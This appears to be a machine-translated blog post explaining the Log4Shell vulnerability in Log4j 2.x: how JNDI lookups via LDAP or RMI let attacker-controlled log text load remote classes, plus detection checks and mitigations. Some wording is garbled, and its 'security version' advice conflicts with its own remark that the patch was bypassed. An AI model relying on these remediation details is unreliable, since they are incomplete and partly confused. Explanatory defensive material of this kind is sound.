If I don’t go to hell, who will? If you find it useful, you can give it a thumbs up. Communicate if you have questions and point out any mistakes.

Palo Alto Networks Inc

 https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/ 

\

For our existing services, the scope of impact is mainly log4j2 introduced by Spring-boot-Starter

Attack mode:

Log4j 2.x supports a tool called lookups that is often used to flexibly set log4j configurations for users. The official description of the search is as follows:

‘ ‘

Lookups provide a way to add values to the log4j configuration at arbitrary places. They are a particular type of Plugin that implements the StrLookup interface.

Lookup provides a way to add values to a Log4J configuration anywhere. These are specific types of plug-ins that implement the StrLookup interface.

‘ ‘ ‘

Ordinary users can use this feature to easily and flexibly add values to a configuration anywhere using a predesigned format. Specifically, when the log method is called in the application, log4j 2.x calls the formage method to check for the specific character ${in each log.

If these characters exist, the Java method lookup is called to find the string following the character ${, and then the expression following the character ${is replaced with the actual value found earlier. For example, when the log function is called in your application to record what is shown in Figure 1, the strings Java: Runtime, Java: VM, and Java: OS after the character ${are treated as arguments to the lookup method and replaced with the corresponding values,

Functional lookups support many types of lookups, such as Jndi lookups, JVM input parameter lookups (JMX), and Web lookups. Jndi lookups allow Jndi to retrieve variables. In Jndi lookups, multiple protocols are supported for remote lookups, such as LDAP and RMI. If the log contains the string shown in Figure 2, the Java method lookup is called to look up the string JNDI: logging/context-name.

Given that log content is usually exposed to the user and that an attacker can easily control log content in many applications, once an attacker controls the string shown in Figure 3 and sets up a malicious Java class on the LDAP server that the attacker controls, The lookup method will be used to execute malicious Java classes on the remote LDAP server.

Key nouns:

JNDI

Java Naming and Directory Interface (JNDI) is a standard Java Naming system Interface provided by SUN Corporation. JNDI provides a unified client API. Administrators map JNDI apis to specific naming services and directory systems through the implementation of the JNDI Service Provisioning Interface (SPI) through different access provider interfaces, enabling Java applications to interact with these naming and directory services.

LDAP

Lightweight Directory Access Protocol (LDAP) is an open, neutral, industry-standard application Protocol that uses IP to provide Access control and maintain Directory information for distributed information.

RMI www.jianshu.com/p/de85fad05…

Introduction of RMI

Java RMI (Remote Method Invocation), a Java API for Remote Procedure Call (RPC), can directly transport serialized Java objects and distributed garbage collection. Its implementation is dependent on the Java Virtual Machine (JVM), so it only supports calls from one JVM to another.



\

Vulnerability detection methods:

The most fundamental reason is that the Lookup class provides JNDI lookup access, even for insecure and untrusted third-party services, and the contents of the log are easily controlled by the user. The bug was discovered by members of Ali Cloud security team (Credit: This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team.) also mentioned in the bug note that “LDAP needs to restrict the servers and classes it can access. By default, JNDI should only support the Java, LDAP, and LDAPS protocols.”

So there are two basic screening methods:

  1. First check to see if the project references the log4J-core package
  2. See if there are any more this class project org/apache/logging/log4j/core/lookup/JndiLookup. Class

Do not send version of the repair:

The basic idea is that

  1. Disable the Lookups method or remove the JndiLookUp file (class)
  2. Disable the JNDI

Security version: 2.15.0-RC2

Since the original patch was discovered to be bypassed, in the interest of implementing as many protections against this vulnerability as possible, the following mitigations are also recommended:

  • Disable suspicious outbound traffic, such as LDAP and RMI on the server in PANW Firewall.

  • Disable JNDI lookup.

    • Set up log4j2.formatMsgNoLookups=true
    • Remove the JndiLookup file in the log4j-core and restart the service.

  • Disable JNDI

    • Set up spring.jndi.ignore=true

Palo Alto Networks will continue to monitor the situation and update this document with any new findings or information.